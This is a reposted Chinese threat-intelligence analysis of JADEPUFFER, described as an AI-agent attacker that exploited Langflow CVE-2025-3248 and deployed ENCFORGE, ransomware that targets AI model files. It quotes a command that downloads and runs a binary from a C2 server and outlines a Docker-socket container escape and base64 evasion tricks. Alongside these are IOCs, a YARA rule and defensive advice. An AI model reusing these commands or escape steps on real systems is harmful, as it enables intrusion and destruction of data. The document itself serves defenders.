文章总结: JADEPUFFER是奇安信威胁情报中心披露的智能体威胁行为体(ATA),利用Langflow漏洞CVE-2025-3248入侵服务器。首次攻击通过MySQLAES_ENCRYPT()加密数据库;第二次部署专为AI基础设施设计的Go勒索软件ENCFORGE,加密模型权重、向量数据库等180种扩展名文件。攻击者5分钟内迭代6个脚本实现容器逃逸。建议修补Langflow漏洞并监控相关IOC。 综合评分: 88 文章分类: 恶意软件,漏洞分析,应急响应,威胁情报,AI安全
JADEPUFFER 进化论:AI 攻击者带着一把”为 AI 基础设施定制的锁”回归
原创
威胁情报中心 威胁情报中心
奇安信威胁情报中心
2026年7月21日 14:46 北京
在小说阅读器读本章
去阅读
概述
2026 年 7 月 1 日,云安全厂商 Sysdig 的威胁研究团队(TRT)披露了一起被他们命名为 JADEPUFFER的攻击行动,并将其归为一种新的威胁主体类型——智能体威胁行为体(Agentic Threat Actor, ATA):攻击能力由 AI 智能体交付,而不是由坐在键盘前的人类操作员驱动。Sysdig 判断其自主性的依据不是猜测,而是一组可观察的行为信号:
- 自我叙述的载荷:攻击载荷中包含自然语言推理、目标优先级排序和详细注释——这是 LLM 生成代码的”本能”,人类操作员很少这样写代码;
- 机器速度的纠错循环:在一次记录中,从登录失败到修复成功只用了 31 秒;
- 会话内理解能力:智能体能读懂环境中植入的自然语言上下文并据此调整行为。
第一次行动中,JADEPUFFER 通过 Langflow 的未授权远程代码执行漏洞 CVE-2025-3248进入一台互联网暴露的服务器,随后自主完成了侦察、凭据收割、横向移动,最终对一台下游的 MySQL + 阿里巴巴 Nacos 生产服务器实施了破坏性的数据库勒索:用 MySQL 自带的 AES_ENCRYPT()函数加密了全部 1,342 条 Nacos 服务配置,然后删除了原始表。
7 月 20 日 Sysdig发布公开报告称JADEPUFFER 回来了——回到同一台 Langflow 服务器。这一次,它带来的不是临时拼凑的 Python 脚本,而是一个编译好的、UPX 加壳的 Go 勒索软件 ENCFORGE(部署到目标上命名为 lockd),一个”专为 AI 和机器学习基础设施打造”的加密器。
两次行动之间只隔了几天。但攻击者的工具箱完成了一次代际升级。
入口:同一个漏洞,同一台服务器
理解这次攻击,先要理解它踩进来的那扇门。
Langflow是一个广泛部署的开源框架,用于构建 LLM 驱动的应用。CVE-2025-3248是其 /api/v1/validate/code端点上的认证缺失漏洞:未经身份验证的攻击者可以直接在主机上执行任意 Python 代码。该漏洞早在 2025 年 5 月就已被 CISA 列入已知被利用漏洞目录(KEV),修复版本(1.3.0)也发布已久——但这台服务器始终没有打补丁,而 CVE-2025-3248 也一直是 JADEPUFFER 在所有已记录行动中的固定入口。
为什么 Langflow 对这类攻击者特别有吸引力?因为它的部署环境天然”富矿”:为了编排各种相连服务,Langflow 实例的运行时环境里通常放着 LLM 厂商的 API Key、云凭据,以及指向向量数据库和对象存储的连接配置。前一次行动已经证实,JADEPUFFER 进入后第一件事就是从 Langflow 自己的 Postgres 后端库里收割凭据,再向外横向移动。
这一次,入口没变,目标变了:从摧毁数据库,变成摧毁这套 AI 技术栈所运行的东西——模型资产本身。
现场复盘:一次失败催生的容器逃逸工具链
Sysdig TRT 捕获的会话记录,是理解”智能体攻击”最好的样本。整个过程可以拆成三个阶段。
阶段 1:标准化后渗透
确认代码执行(id、uname -m、hostname)之后,JADEPUFFER 按惯例横扫环境:云厂商密钥、数据库连接串、API Token;随后通过 /dev/tcp探测内部服务的可达性,并把收集到的凭据对着内部数据库和缓存服务逐一重放。
阶段 2:发现 Docker socket,投递失败
随后它找到了 /var/run/docker.sock并确认 Docker 守护进程可用。这里需要强调一个关键事实:能写 Docker socket 就等同于拿到宿主机 root——任何能访问它的进程都可以指示守护进程创建一个挂载了宿主机文件系统的特权容器,借此突破容器命名空间,读写宿主机上的任何位置。
攻击者尝试直接从 C2 拉取勒索软件二进制:
curl -m30 -o /tmp/.sk/lockd http://34.153.223[.]102:9191/lockd && chmod +x
下载没有落地。它用 ls确认了这一点。
一般的自动化脚本到这里就失败了。JADEPUFFER 没有放弃目标,而是当场更换了攻击路线:既然二进制没法从容器里下载,那就想办法把它从容器的 procfs 里、通过一个挂载宿主机目录的特权逃逸容器,搬到宿主机上直接运行。Sysdig 指出,这个从”下载二进制”到”自建跨命名边界逃逸机制”的 pivot,正是本次会话中的”智能体指纹”——和上一次行动中那个 31 秒诊断纠错的行为一脉相承,只是这次要解决的问题复杂得多。
阶段 3:五分钟内迭代出六个脚本
通过 Langflow 的 RCE 通道,JADEPUFFER 在 5 分 24 秒内连续构建并迭代了六个 Python 脚本,每一版都在修正前一版的具体失败:
| 时间 | 文件 | 变更 |
| — | — | — |
| 12:07:01 | do.py v1 | 基线版 curl --unix-socket封装 |
| 12:07:25 (+24s) | do.py v2 | 增加经由 /proc/<pid>/root的复制;去掉通用 exec |
| 12:08:08 | ns.py | 抽取共享的 exec_in_bigrun()辅助函数;硬编码 PID 4242 |
| 12:08:39 | x.py | 每条命令用一个一次性容器 |
| 12:09:01 | h.py | 裸 AF_UNIX socket HTTP 客户端,摆脱 subprocess 依赖 |
| 12:10:04 | deploy.py v1 | 通过 Docker API 的 State.Pid动态发现宿主机 PID;复制 + 试运行 |
| 12:12:28 (+2m24s) | deploy.py v2 | 增加 --lock实弹加密运行和运行后验证 |
构建手法本身也值得注意。第一个脚本是逐行写入的——每次 RCE 调用只写一行,让任何单个请求在基于签名的检测面前都是无害的;从第二个脚本开始,它切换为单发内联 Base64 解码:整个脚本编码在一次调用里,通过 exec()内的 base64.b64decode()解码,并用 raise Exception('WROTE:' + ...)把写入确认经由 Langflow 的报错通道泄露回来。这种手法对 shell 层面的 base64 -d模式搜索是不可见的。
最终的 deploy.py v2是一条全自主流水线,四步走完整个攻击:
- 复制:创建特权容器(
Privileged: true、PidMode: host、Binds: ["/:/host:rw"]),用nsenter --target 1进入宿主机命名空间,把lockd从容器 procfs(/proc/<host_pid>/root/tmp/.sk/lockd)复制到宿主机的/tmp/.sk/; - 试跑:以
--try-run模式只做扫描、不加密; - 实跑:
nohup /tmp/.sk/lockd --lock --task-id gcp_h1后台启动真正的加密; - 验证:检查进程、读取日志、统计全盘中
.locked后缀文件的数量,确认执行成功。
注意实跑命令里的 --task-id gcp_h1——这说明操作者在用任务 ID 把这台机器作为一个更大规模舰队行动中的 GCP 目标来跟踪(同时观察到的还有 gcp_test)。勒索软件已经开始带”战役管理”功能了。
ENCFORGE 解剖:一把为 AI 资产打造的锁
基本画像
Sysdig 从 C2 上取回了样本(有意思的是,文件在服务器上以 .lockd命名——前导点让它不出现在普通目录列表里,直接访问 /lockd返回 404,只有 GET /的索引页会暴露它):
| 属性 | 加壳版 | 脱壳后 |
| — | — | — |
| SHA-256 | 8cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 | ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328 |
| 大小 | 1,501,888 B | 4,767,896 B |
| 加壳 | UPX 5.20 | — |
| 运行时 | — | Go 1.22.12,静态编译 |
| 杀软检出 | 无 | 无 |
分析时,主流威胁情报工具对两个哈希均无记录。二进制内部的项目名是 encfile(encfile/cmd/lock),错误信息里还引用了一个配套的密钥生成工具 keyforge——这两个名字本身就是可用于检测的独特标识。
目标清单:为 AI 环境而设计的最直接证据
完整的二进制包含约 180 个目标扩展名(上一份报告估计约 140 个,对脱壳二进制的完整分析修正了这个数字)。这份清单不是顺带的,它扫过了现代 ML 技术栈的几乎每一层:
模型格式与检查点:
.ckpt(TensorFlow / PyTorch 检查点).h5(HDF5,Keras / TensorFlow).onnx(ONNX 模型交换格式).pb(TensorFlow protobuf).pkl/.pickle(Python 序列化模型与数据).pt/.pt2/.pth(PyTorch).safetensors(HuggingFace SafeTensors,当前模型权重安全序列化的事实标准).ggml/.gguf(llama.cpp 量化模型格式,本地部署 LLM 的主流格式).model(通用模型文件)
向量数据库与嵌入索引:
.faiss(FAISS 向量索引,嵌入检索的常用组件)
训练数据集与列式数据:
.arrow/.feather(Apache Arrow,ML 数据集交换标准).parquet(大规模训练数据集的主流格式).tfrecord(TensorFlow 训练管线输入格式).npy/.npz(NumPy 数组,权重与激活值).vec(word2vec / fastText 嵌入向量).duckdb(DuckDB,数据科学与 ML 分析中越来越常见)
暗示跨平台意图的开发者格式:
.keychain/.keychain-db(macOS 钥匙串凭据库).xcodeproj(Xcode 工程文件).pages/.numbers(苹果办公格式)
最能说明”蓄意为之”的是 --include参数。二进制自带的帮助文本写道:该参数用于”向默认加密白名单追加逗号分隔的扩展名/通配符”,而给出的示例是 .lora,.ggjt——LoRA 微调适配器和老版 GGML 模型权重。作者在选择”用户可能想额外加密什么”的示例时,选的全是 ML 产物。这不是一个通用文件加密器顺手覆盖了 AI 格式,而是一个预期操作者会按战役定制目标清单的 AI 环境专用勒索软件。
入口与载荷的组合同样不是巧合:Langflow 部署就坐落在 ENCFORGE 要摧毁的基础设施旁边——模型权重、向量库、训练管线,恰恰是一个 AI 编排框架天生要打交道的对象。
加密与反恢复机制
- 加密方案:AES-256-CTR + RSA-2048 KEM 混合加密。批量加密用计数器模式的 AES-256,每次运行的对称密钥用编译进二进制的 RSA-2048 公钥包裹。这个内嵌公钥是一个稳定的、按构建区分的 IOC。
- 速度优化:不做全文件加密,而是基于区域的加密——只加密每个文件的选定部分。这与 LockBit、BlackCat 级别的加密器思路一致,对动辄几十上百 GB 的模型权重和数据集尤其”高效”:哪怕只破坏部分区域,模型文件也整体报废。
- 执行行为:加密前杀死持有文件锁的进程;支持幂等续跑(中断后重启不会重复加密已处理文件导致二次损坏);运行结束后自删除;加密文件统一追加
.locked后缀;以README、HOW_TO_DECRYPT、README_DECRYPT为名投放勒索信。 - 单重勒索:对完整 encfile 模块的分析确认,二进制没有任何网络能力——无外联、无
net/http、无云存储客户端、无数据暂存逻辑。两次行动中也都未发现数据外泄的证据,没有泄露站,没有 Tor 支付门户。JADEPUFFER 的筹码只有加密本身,玩的是”破坏优先”的简单打法,而非 RaaS 圈子流行的双重勒索。 - 跨平台迹象:这个 Linux 构建里带着可运行的 Windows 反恢复代码——
WipeShadowCopies和DisableRecoveryActions函数中是对vssadmin.exe(删除卷影副本)和bcdedit.exe(禁用启动恢复)的字面调用;Windows 进程猎杀名单里有MSSQLSERVER、sqlite3.exe、outlook.exe、winword.exe、onenote.exe等。encfile 是一套按目标 OS 分别编译的 Go 代码库。macOS 构建可能存在(扩展名清单里有 macOS 专属的钥匙串和 Xcode 格式),但该构建中没有任何 macOS 特有的系统调用或进程名,代码层面的 macOS 支持尚未证实。
勒索信与密钥策略
勒索信的核心条款之一是:”Do NOT share this file. Each victim has a unique key.”(不要分享此文件,每位受害者持有唯一密钥。)Sysdig 认为这句是刻意设计:意味着按受害者逐一分发密钥,一笔赎金买到的解密器无法惠及其他受害者。
一个花絮:同形字 Python 解释器
C2 根目录还暴露了另一个暂存目录树:pv/bin/python、pv/bin/python3,以及 pv/bin/𝜋thon——第三个文件名在 “thon” 前面拼了一个 U+1D70B(数学粗体小写 π)。三个文件字节完全一致(CPython 3.14,已确认为良性)。这是一个经典的字符串规避手法:按 ("python","python3")检查进程名,或者 pkill python3,都会漏掉那个 π 开头的副本。本次会话中 JADEPUFFER 并未使用它——已暂存,未部署。
两次行动对比:几天之内的一次”工业化”
勒索信中的联系方式 [email protected]与上一份报告披露的完全一致——这是最强的归因纽带,比源 IP 或基础设施都更可靠:同一个操作者,工具箱大幅升级。
| 维度 | 前一次行动 | 本次行动 |
| — | — | — |
| 加密方式 | MySQL AES_ENCRYPT(content, KEY),数据库原生函数,密钥临时生成从不落地 | AES-256-CTR + RSA-2048 KEM,按文件加密,密钥用内嵌公钥包裹 |
| 作用范围 | 单一目标:生产数据库服务器 | 全文件系统,约 180 种扩展名 |
| 工具形态 | Python 脚本、用完即弃的一行命令 | 编译型 Go 二进制,专业 CLI(cobra),独立 keygen 配套工具 |
| 部署方式 | 经 RCE 通道直接执行 | 需要投递 + 容器逃逸机制 |
| 战役跟踪 | 未观察到 | 按战役打 --task-id:观察到 gcp_h1/ gcp_test |
| 对 AI 的态度 | 窃取(凭据横扫包含 AI 密钥) | 摧毁(ML 模型格式写入默认清单和 --include示例) |
从 Python 脚本和 MySQL 内置函数,到混合加密、独立密钥工具、跨平台 Windows 支持和战役 ID 追踪系统——JADEPUFFER 的演进轨迹符合一个在两次行动之间持续投资可复用基础设施的操作者画像。而那种定义了第一次行动的”智能体行为”——快速失败、快速修正——这次用在了更难的问题上:当二进制下载失败时,实时构建一套容器逃逸工具链。
为什么 AI 资产的勒索账算起来不一样
传统勒索软件赌的是你没有备份。ENCFORGE 赌的是一件更狠的事:有备份也未必够。
备份能恢复到最后一次快照的状态,而不是被攻击那一刻的状态。对一个生产级微调模型来说,快照与攻击时刻之间的 gap 可能是数周甚至数月的训练轮次、微调迭代和数据清洗。补上这个 gap 是一次庞大的工程重建,而不是一次恢复操作:单次训练的硬件成本尚可,但达到生产级效果需要多轮实验,加上设计、管理、验证这些实验的工程人力——成本正是在这里堆积的。
Sysdig 给出的估算是:一个有代表性的企业级微调模型,直接恢复成本约 7.5 万至 50 万美元,主要随模型规模和专有训练数据的复杂度浮动。而且这是每个模型的价格——生产环境通常在共享存储上跑多个特化变体,ENCFORGE 一次调用就能把它们全部加密。
如果训练数据也在同一台主机上(实践中很常见),损失会进一步叠加,恢复被彻底阻断:组织只能退回基座模型,先重建专有数据集,再谈重新训练。向量索引等推理产物同理——它们依赖的底层数据恢复之前,索引无从重建。
防御建议
修补入口(最优先):
- 将 Langflow 升级到 1.3.0 或更高版本。CVE-2025-3248 早已进入 CISA KEV 目录,修复窗口已经非常充裕。
加固容器环境:
- 限制 Docker socket 访问。如果应用容器必须挂载
/var/run/docker.sock,用 socket 代理收紧到只允许必需的 API 调用——Langflow 一个都不需要; - 以非 root 运行 Langflow 容器,可写目录挂
noexec; - 对来自容器进程的
nsenter调用建立告警。
保护 AI 模型资产:
- 对模型权重目录施加文件系统级访问控制——模型权重和训练数据集不应让 Web 应用进程用户可读;
- 为生产模型产物维护离线或不可变快照。针对
.gguf、.safetensors、.ckpt的勒索软件可以不碰任何传统业务数据就瘫痪你的生产 AI 系统; - 把 ML 资产路径上
.locked后缀文件的创建事件纳入检测覆盖; - 不要在 Langflow 运行时环境里存放 AI 厂商 API Key(OpenAI、Anthropic、HuggingFace 等)——前一次行动证实,这些密钥在入侵后会立刻被收割。
凭据卫生:
- 审计 Langflow 进程可触及的所有凭据;任何跑过受影响版本的主机,其环境变量、实例元数据、凭据文件中暴露过的凭据一律轮换。
结语:威胁模型已经变了
JADEPUFFER 的前一次行动证明:人类可以把一个智能体指向目标环境,LLM 自己就能完成数据库勒索。这一次的演进证明:同一个操作者带着升级后的能力回来了,目标也更锋利——它从哪里进来,就摧毁什么。
对正在建设或运营 AI 基础设施的组织来说,这意味着威胁模型的扩展:攻击者从一个暴露的 AI 框架进来时,随身带的载荷就是为这个框架所连接的东西量身定做的。加密的业务文件可以从备份恢复,加密的生产模型往往不能。模型产物,从此应该和数据库一起,写进备份与恢复计划里。
技术附录
附录 A:MITRE ATT&CK 技术映射
| 战术阶段 | 技术 ID | 技术名称 | 本次行动中的表现 |
| — | — | — | — |
| 初始访问 | T1190 | Exploit Public-Facing Application | 利用 Langflow CVE-2025-3248(/api/v1/validate/code未授权 RCE) |
| 执行 | T1059.006 | Command and Scripting Interpreter: Python | 通过 RCE 通道逐行/单发 Base64 方式投递并执行 Python 脚本 |
| 凭据访问 | T1552 | Unsecured Credentials | 横扫云密钥、API Token、数据库连接串 |
| 发现 | T1046 | Network Service Discovery | 通过 /dev/tcp探测内部服务可达性 |
| 发现 | T1613 | Container and Resource Discovery | 定位 /var/run/docker.sock并验证守护进程响应 |
| 横向移动 | T1021 | Remote Services | 重放凭据访问内部数据库与缓存服务 |
| 权限提升 / 逃逸 | T1611 | Escape to Host | 创建特权容器(Privileged+ PidMode: host+ 挂载 /),经 procfs 跨界复制载荷,用 nsenter --target 1在宿主机命名空间执行 |
| 命令与控制 | T1071.001 | Application Layer Protocol: Web | 经 HTTP 从 C2 34.153.223[.]102:9191拉取载荷 |
| 防御规避 | T1027 | Obfuscated Files or Information | UPX 5.20 加壳;Base64 内联解码经 exec()落地;C2 上以 .lockd隐藏文件;暂存同形字文件名 𝜋thon(U+1D70B) |
| 防御规避 | T1070.004 | Indicator Removal: File Deletion | 勒索软件运行后自删除 |
| 影响 | T1486 | Data Encrypted for Impact | AES-256-CTR + RSA-2048 KEM 加密约 180 种扩展名,追加 .locked后缀 |
| 影响 | T1490 | Inhibit System Recovery | Windows 构建代码调用 vssadmin.exe删除卷影副本、bcdedit.exe禁用启动恢复 |
| 影响 | T1489 | Service Stop | 加密前杀死持有文件锁的进程(含数据库与办公进程名单) |
注:以上映射基于 Sysdig 公开报告中描述的行为整理。
附录 B:失陷指标(IOC)
网络指标
| 类型 | 指标 |
| — | — |
| 攻击来源 | 45.131.66[.]106 (AS49453,荷兰) |
| C2 | 34.153.223[.]102 (GCP),端口 9191 |
| 二进制投递 | hxxp://34.153.223[.]102:9191/.lockd (前导点隐藏;/lockd返回 404) |
| 暂存解释器 | hxxp://34.153.223[.]102:9191/pv/bin/{python,python3,𝜋thon} |
文件哈希(SHA-256)
| 文件 | 哈希 |
| — | — |
| lockd(UPX 5.20 加壳) | 8cb0c223b018cecef1d990ec81c67b826eb3c30d54f06193cf69969e9a8baea2 |
| lockd(脱壳,Go 1.22.12) | ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328 |
| 暂存 CPython 3.14(良性) | ab9824b61587c77a8d8649545cdbdc63ed2c384e45c9aba534e3f457f96efa7a |
构建级稳定指标
- RSA-2048 公钥(DER)SHA-256:
2378bf45bb54fb2defc460063c9b43e09870741b62692b7f6acbc3cd7898bb3 - 内部项目名:
encfile;配套 keygen 工具:keyforge - 勒索联系方式:
[email protected] - 加密文件后缀:
.locked - 勒索信文件名:
README、HOW_TO_DECRYPT、README_DECRYPT - 观察到的战役任务 ID:
gcp_h1、gcp_test
内嵌 RSA-2048 公钥
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7wZB6Q/Y0wZ7/Gax8i3Z
PybS9t5fCkOT37mavrcSZ+V+tt6M6jChhf+b+ASUNa6uIr4l+MCc7XAsJmpmnyyd
2aZYhMSbbO5YpmKL6AFgJBhhB37NvpzWje6CFk5rpZQ7sUlhMHXdi63Bqo6bAZaW
8+MDG8K6W55Y10XmRTqKUPrDYJFD9z8LnbJJeBQggpM3XS0C0lXF5yxq0WpyMpnO
8O24t+jzhkRuCwVsMd7sw3qKxQ7t7fdBYs4wEvL9r/jrt2Z7OiBnueEIuJFDULjF
ckJshJGwNNjXiEmZr7mT9ei56UvIwPjnepQC6ex2PwnmcYw1uPef1A3Qpy+VhxyT
dwIDAQAB
-----END PUBLIC KEY-----
附录 C:YARA 检测规则(脱壳样本,来源:Sysdig TRT)
该规则分两层命中:家族簇通过编译进二进制的 Go 包路径匹配 encfile 代码库的任意构建;构建簇通过内嵌 RSA-2048 公钥匹配当前样本。
rule ENCFORGE_Ransomware_Unpacked {
meta:
description = "Detects ENCFORGE ransomware locker (unpacked ELF) targeting AI/ML infrastructure, attributed to JADEPUFFER"
author = "Sysdig Threat Research Team"
date = "2026-07-15"
sha256 = "ea7822eac6cecef7746c606b862b4d3034856caf754c4cf69533662637905328"
tlp = "WHITE"
strings:
$pkg_enc = "encfile/internal/cli/enc" ascii
$pkg_crypter = "encfile/internal/crypter" ascii
$pkg_discover = "encfile/internal/discover" ascii
$keyforge = "run keyforge gen" ascii
$tryrun = "TRY-RUN (scan-only, --lock not set)" ascii
$killing = "killing holders" ascii
$dis_recovery = "[*] Disabling recovery" ascii
$renamed = "encrypted+renamed:" ascii
$unique_key = "Do NOT share this file. Each victim has a unique key." ascii
$rsa_key = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA7wZB6Q" ascii
condition:
uint32(0) == 0x464c457f // ELF magic
and filesize > 2MB
and filesize < 15MB
and (
(2 of ($pkg_*) and 2 of ($keyforge, $tryrun, $killing, $dis_recovery, $renamed, $unique_key))
or
($rsa_key and 1 of ($pkg_*))
)
}
#
参考来源
- https://www.sysdig.com/blog/jadepuffer-evolves-the-agentic-threat-actor-deploys-ransomware-built-to-destroy-ai-models
- https://www.sysdig.com/blog/jadepuffer-agentic-ransomware-for-automated-database-extortion
- https://www.bleepingcomputer.com/news/security/jadepuffer-agentic-attacks-now-target-ai-model-data-with-ransomware/
- https://www.bleepingcomputer.com/news/security/jadepuffer-ransomware-used-ai-agent-to-automate-entire-attack/
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:奇安信威胁情报中心 威胁情报中心 威胁情报中心《JADEPUFFER 进化论:AI 攻击者带着一把”为 AI 基础设施定制的锁”回归》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。









评论